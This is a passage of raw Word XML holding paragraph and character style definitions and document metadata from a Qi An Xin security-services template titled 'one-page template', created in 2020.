    <w:name w:val="目录1级（奇安信）"/>
    <w:basedOn w:val="12"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="90">
    <w:name w:val="图表目录条例（奇安信）"/>
    <w:basedOn w:val="15"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
      </w:tabs>
      <w:ind w:left="420" w:hanging="210"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="91">
    <w:name w:val="标题 5 Char"/>
    <w:basedOn w:val="20"/>
    <w:link w:val="6"/>
    <w:semiHidden/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="92">
    <w:name w:val="表格内容两端对齐(奇安信)"/>
    <w:basedOn w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="93">
    <w:name w:val="HTML 预设格式 Char"/>
    <w:basedOn w:val="20"/>
    <w:link w:val="17"/>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北京奇安信集团</Company>
  <Pages>32</Pages>
  <Words>1057</Words>
  <Characters>6031</Characters>
  <Lines>50</Lines>
  <Paragraphs>14</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>7074</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2020-03-24T10:55:00Z</dcterms:created>
  <dc:creator>安服作训部</dc:creator>
  <cp:lastModifiedBy>yangyi</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-10T20:46:09Z</dcterms:modified>
  <dc:subject>安服作训部文档模板</dc:subject>
  <dc:title>一页纸模板</dc:title>
  <cp:revision>391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